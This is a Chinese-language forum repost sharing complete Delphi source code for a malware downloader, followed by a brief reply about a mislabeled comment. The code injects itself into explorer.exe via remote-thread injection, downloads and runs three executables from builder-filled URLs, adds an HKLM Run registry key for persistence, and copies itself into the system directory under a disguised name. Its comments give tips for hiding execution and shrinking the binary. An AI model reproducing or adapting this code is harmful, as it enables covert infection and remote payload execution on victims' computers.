[轉貼] delphi下載者源碼

1. program downloader;
   
2. 
   
3. {$IMAGEBASE $13140000}
   
4. 
   
5. uses
   
6. Windows,
   
7. SysUtils,
   
8. urlmon,    //下載單元 ，這個改api減少體積不多
   
9. Registry; //注冊表單元,這個可以改成api，會減少很多體積
   
10. 
    
11. var
    
12. url: pchar ='                                            ';    //依次3個留出了生成器寫入下載地址的位置
    
13. url2: pchar ='                                            ';
    
14. url3: pchar ='                                            ';
    
15. procedure Download; //下載過程
    
16. begin
    
17. URLDownloadToFile(nil, url, 'C:\windows\temp\system.exe', 0, nil);    //下載文件
    
18. WinExec('C:\windows\temp\system.exe', SW_SHOW); //SW_SHOW or SW_HIDE //執行文件 sw_show是顯示運行，sw_hide是隱藏運行
    
19. 
    
20. URLDownloadToFile(nil, url2, 'C:\windows\temp\system2.exe', 0, nil);
    
21. WinExec('C:\windows\temp\system2.exe', SW_SHOW); //SW_SHOW or SW_HIDE    //winexec可以用api寫，減少體積
    
22. 
    
23. URLDownloadToFile(nil, url3, 'C:\windows\temp\system3.exe', 0, nil);
    
24. WinExec('C:\windows\temp\system3.exe', SW_SHOW); //SW_SHOW or SW_HIDE
    
25. end;
    
26. 
    
27. var
    
28. hModule, hModule_News: Pointer;
    
29. Extent, Size, ThreadId: longword;
    
30. ProcessHandle, Pid: longword;
    
31. reg:TRegistry;
    
32. sysdir:array[0..50] of char;
    
33. 
    
34. begin
    
35. GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
    
36. //獲取Exp進程的PID碼,Shell_TrayWnd為類名,相關的需用SPY++來查看
    
37. 
    
38. ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, Pid); //打開進程
    
39. 
    
40. hModule := Pointer(GetModuleHandle(nil));
    
41. //這裡得到的值為一個返回一個指針型變量,指向內容包括自身映像的基址和長度
    
42. 
    
43. Extent := PImageOptionalHeader(Pointer(integer(hModule) + PImageDosHeader(hModule)._lfanew + SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
    
44. //得到內存映像的長度
    
45. 
    
46. VirtualFreeEx(ProcessHandle, hModule, 0, MEM_RELEASE);
    
47. //在Exp進程的內存範圍內釋放一個足夠長度的內存
    
48. 
    
49. hModule_News := VirtualAllocEx(ProcessHandle, hModule, Extent, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    
50. //確定起始基址和內存映像基址的位置
    
51. 
    
52. WriteProcessMemory(ProcessHandle, hModule_News, hModule, Extent, Size);
    
53. //確定上面各項數據後,這裡開始進行操作
    
54. 
    
55. CreateRemoteThread(ProcessHandle, nil, 0, @Download, hModule, 0, ThreadId);
    
56. //建立遠程線程,至此注入過程完成
    
57. 
    
58. CloseHandle(ProcessHandle);
    
59. //關閉對像
    
60. 
    
61. {上面這段代碼是插進程explorer.exe}
    
62. begin
    
63. Reg := TRegistry.Create;
    
64. Try
    
65.    Reg.RootKey := HKEY_LOCAL_MACHINE;
    
66.    Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', True);
    
67.    Reg.WriteString('system', 'intenat.exe'); //寫入數據
    
68.    Reg.CloseKey;
    
69. Finally
    
70.    Reg.Free;
    
71. End;
    
72. //上面是寫注冊表代碼
    
73. 
    
74. GetSystemDirectory(sysdir,50);    //獲取系統目錄，賦給sysdir變量，getwindowsdirectory是獲取windows目錄
    
75. if not FileExists(sysdir+'\intenat.exe') then    //如果系統目錄下不存在intenat.exe則執行
    
76.    copyfile(pchar(paramstr(0)),pchar(sysdir+'\intenat.exe'),true); //復制自身到系統目錄下，名字是intenat.exe
    
77. 
    
78. end;
    
79. end.

複製代碼

VirtualFreeEx(ProcessHandle, hModule, 0, MEM_RELEASE);
//在Exp進程的內存範圍內分配一個足夠長度的內存

請問VirtualFreeEx不是釋放嗎? 怎麼會是分配?

VirtualFreeEx(ProcessHandle, hModule, 0, MEM_RELEASE);
//在Exp進程的內存範圍內分配一個足夠長度的內存 ...
阿軍 發表於 2010-8-22 13:47

謝謝, 立即修正